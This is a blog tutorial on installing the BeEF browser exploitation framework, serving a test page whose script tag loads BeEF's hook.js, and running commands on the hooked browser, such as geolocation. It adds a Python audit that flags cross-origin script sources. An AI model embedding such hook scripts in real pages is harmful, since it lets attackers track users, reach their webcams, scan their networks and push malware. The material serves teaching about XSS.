How to Make a Custom BeEF Hook Page
(Note: If you'd like a LOT more detail then have a look at my Pluralsight course on BeEF - a free 10 day trial will give you access)
Cross Site Scripting (XSS) is a vulnerability affecting web pages that allow code to be injected into them from an unauthorised third party. If this vulnerability exists in a website then an attacker may be able to execute code in the browser belonging to other users of that website.
XSS can be an underrated problem. Often when we prove the existence of XSS we use a simple piece of JavaScript that shows a dialog box. The simplicity of showing a dialog box hides the implications of being able to run arbitrary JavaScript on another user's browser. So how can we highlight those implications more conspicuously?
Enter the Browser Exploitation Framework, or BeEF for short.
BeEF has over 200 built-in commands that show the extent to which XSS can impact a user, and you can even add your own commands. In this article we'll look at using BeEF to perform some basic commands.
Setting up BeEF
First a note on setting up BeEF. Installation on Kali Linux based systems is as simple as:
apt-get update
apt-get install beef-xss
For other Linux based installs it's worth looking at the installation guide on the BeEF website.
It's worth noting that it's not officially supported on Windows. From here on we're going to assume that we've used apt-get to install on Kali Linux.
Starting BeEF
To start the service we'll need to navigate to the directory where BeEF lives:
cd /usr/share/beef-xss
From here we need to add a password before we can start the service, so we'll open the config.yaml file up and find where we need to modify the password. Currently the username and password are both "beef". You can change both the username and password if you like, but at a minimum, you need to change the password before the service will start.
Once you save that we'll then be able to start BeEF just by typing:
./beef
After a few seconds you'll see output to the screen to show the service has started. It will show you the location of the script file you'll need later and also the URL for the user interface that we'll use to interact with BeEF:
You'll note that the above image shows two different IP addresses: one is available only to the local machine (127.0.0.1) and the other (10.0.2.15) is available to the network we're attached to. We'll be using 127.0.0.1 for the purpose of this article, although in a real scenario you'd want an internet facing address.
Trying BeEF on Yourself
We're not going into the intricacies of injecting JavaScript into a page in this post, so instead we're just going to create a web page that already has the BeEF script in it. Below you'll see some HTML that contains a reference to the JavaScript that our BeEF server is giving us to use, as detailed in the screenshot above:
<html>
<head>
<title>Example BeEF hooked page</title>
</head>
<body>
<p>This page should be running the hook script for BeEF</p>
<script src="http://127.0.0.1:3000/hook.js"></script>
</body>
</html>
Create a new file:
nano /var/www/html/indexBeef.html
...and add the above HTML to it.
Then start your local Apache web server with:
/etc/init.d/apache2 restart
Once that starts, use the browser to navigate to:
http://localhost/indexBeef.html
... to view the page, which will start the BeEF script and hook the browser. Again, in a real scenario, our BeEF page would be accessed by a user across the internet, but we're using the local machine here for demonstration purposes.
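Seen from the defending side, the test page is an HTML document that loads a script from an origin other than its own (localhost versus 127.0.0.1:3000). The following Python check is an added example, not code from the original article or the BeEF project: it lists every script src on a page whose origin is neither the page's own nor on an allowlist. The function names, the allowlist parameter and the sample page with /js/site.js are assumptions made for the illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return (scheme, host, port) for a URL, filling in the default port."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    return (scheme, (parts.hostname or "").lower(),
            parts.port or DEFAULT_PORTS.get(scheme))


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> tag (None for inline)."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sources.append(dict(attrs).get("src"))


def audit_scripts(html, page_url, allowed_origins=()):
    """Return resolved script URLs whose origin is neither the page's own
    origin nor in allowed_origins (an assumed, site-specific allowlist)."""
    trusted = {origin(page_url)} | {origin(o) for o in allowed_origins}
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        if src is None:
            continue  # inline script: out of scope for this check
        resolved = urljoin(page_url, src.strip())  # handles relative and // URLs
        if origin(resolved) not in trusted:
            findings.append(resolved)
    return findings


# Constructed sample: the article's test page plus one same-origin script.
SAMPLE_PAGE = """<html><head><title>Example BeEF hooked page</title>
<script src="/js/site.js"></script></head>
<body><p>This page should be running the hook script for BeEF</p>
<script src="http://127.0.0.1:3000/hook.js"></script></body></html>"""

if __name__ == "__main__":
    for url in audit_scripts(SAMPLE_PAGE, "http://localhost/indexBeef.html"):
        print("unexpected script origin:", url)
```

The same allowlist is what a Content-Security-Policy script-src directive would enforce in the browser.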
Logging in to the BeEF User Interface
At this point our BeEF server should now have a connection to the browser running the script. The easiest way to check that is to log in to the BeEF user interface. This URL was given to us when we started the BeEF service; in our case it was:
http://127.0.0.1:3000/ui/panel
Navigating to this gives us a login screen, so we need the username and password that we initially put into the config file.
Once we've logged in we'll have access to the main admin screen, which should look something like this:
There at the top left you can see we've got a browser listed as being online. That's our connection to the hooked browser.
Now that we've "hooked" a browser, what can we do with it?
Running Commands Against a Hooked Browser
If we click on the hooked browser (as highlighted above) then we'll get some details about the browser and the machine it's running on. Clicking on the command tab will give us the commands available to us:
From there we can browse the available commands in the tree, or use the search box if we already know the name of the command we want.
Commands are only using functionality available to us through JavaScript on the page, but if you look at the commands you'll see a huge wealth of possibilities, everything from attempting to use an available webcam to scanning the network visible to the hooked browser.
A good example is the geolocation command, which allows you to see where a browser is physically located. If we search for the geo command, choose one of the optional APIs to help with geolocation and execute it, we get a response like the following:
You can see that the response gives us a physical location. While I've blanked out some of the result, I can say that it gives a fairly accurate location, including latitude and longitude, along with useful data like a partial postcode and even my broadband provider.
Available commands can potentially do all of the following and more:
- Interact with the DOM (change HTML on the page)
- Discover extensions
- Interact with a webcam
- Scan the client network
- Assist with social engineering, including getting users to download malicious files
Learning More About BeEF
For a deeper dive into using BeEF and how it works, take a look at my Pluralsight course "Getting started with BeEF".
If you're not already signed up to Pluralsight then you can get a free ten day trial here.
Here's a teaser for the course:
BeEF Project
BeEF (GitHub)
Got a comment or correction (I'm not perfect) for this post? Please leave a comment below.
Source: https://www.gavinjl.me/getting-started-with-beef/